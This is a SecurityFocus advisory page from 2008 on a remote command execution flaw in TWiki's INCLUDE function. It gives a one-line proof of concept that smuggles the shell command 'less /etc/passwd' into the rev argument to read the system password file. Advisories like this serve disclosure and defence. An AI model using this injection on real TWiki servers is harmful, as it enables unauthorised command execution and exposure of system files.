Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution Vulnerability

An exploit is not required.

The following proof of concept example is available:
%INCLUDE{ "Main.TWikiUsers" rev="2|less /etc/passwd" }%







 

Privacy Statement
Copyright 2008, SecurityFocus